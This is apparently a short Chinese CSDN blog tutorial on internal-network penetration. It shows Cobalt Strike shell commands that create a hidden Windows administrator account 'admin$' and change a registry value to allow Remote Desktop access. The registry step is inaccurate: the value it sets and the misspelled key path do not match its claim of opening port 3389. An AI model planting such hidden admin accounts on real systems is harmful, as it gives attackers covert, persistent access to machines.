内网渗透--远程桌面

本文介绍了如何在Windows内网环境中进行渗透测试,特别是通过远程桌面隐藏用户admin$的创建和管理。首先创建带"$"符号的admin$用户并将其添加到管理员组,然后通过修改注册表权限来隐藏该用户,最后解决远程桌面连接问题。
摘要由CSDN通过智能技术生成

内网渗透–远程桌面

前言

学代码审计有些枯燥,加上俺内网啥也不会,学学内网换换口味。

隐藏用户的创建

因为在Windows环境下创建用户后面如果带入一个“$"符号,在net user时默认是不显示的。

利用条件:获得管理员权限

首先在cs中输入以下命令

shell net user admin$ 123456 /add

shell net localgroup administrators admin$ /add

第一句是创建一个admin$用户密码为123456.第二句是将用户加入管理组。

我们来验证一下,使用net user命令并无admin用户

然后远程打开3389端口。

reg add “HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

现在已经可以远程连接了,但是中用户组中依然可以看见admin$

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值